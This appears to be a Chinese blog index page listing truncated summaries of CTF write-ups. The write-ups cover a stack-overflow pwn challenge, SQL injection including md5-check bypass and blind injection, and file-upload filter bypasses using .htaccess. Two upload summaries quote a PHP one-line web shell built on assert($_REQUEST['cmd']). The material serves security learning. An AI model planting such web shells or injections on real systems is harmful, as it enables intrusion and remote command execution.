高诺琪

摘要： 伪代码如下，先获取一个随机数 然后用strncmp比较用户输入的值和随机数，这里可以用 \x00 来绕过strncmp，因为strlen遇到 \x00 会停止 因为a1是函数sub_804871F的返回值，那就让a1为 \xff 这样就可以进行栈溢出了 然后通过栈溢出来getshell，这里用lib 阅读全文

摘要： 这题的知识点是绕过密码的md5验证，参考Y1ng师傅的文章 看到题目，fuzz了一下，过滤的并不多 而且页面源码有给sql语句，不过需要先base32再base64解码 select * from user where username = '$name' 直接可以用联合注入，表里有三列 1' Or 阅读全文

摘要： 页面已经告诉我们flag在flag表中了，直接查询就是了 看了一下页面回显，输入1和2正常回显 输入其他函数，发现一些字符被过滤掉了，fuzz一下看看那些字符被过滤，除了472的其他都被过滤了 可以看到ascii和substr没有被过滤，那就直接盲注 盲注脚本(参考这里) import reques 阅读全文

摘要： 大佬的wp 首先上传包含一句话的php文件，提示illegal suffix!，试了一下.php3，.php5，.phtml等都不行 把文件后缀名改成.jpg试一下，检测到了内容 <? 那就用其他姿势 <script language='php'>assert($_REQUEST['cmd'])</ 阅读全文

摘要： 还是多积累吧，练得少没啥思路，借鉴其他大佬的wp 试了一下上传格式不支持.jpg和.gif，但是可以用png，根据提示不能上传带有ph的格式，试一下.hatcess，成功怼进去了 上传普通的一句话会被和谐掉，大佬说可能过滤了 <? 用js引用php可以绕过过滤 <script language='p 阅读全文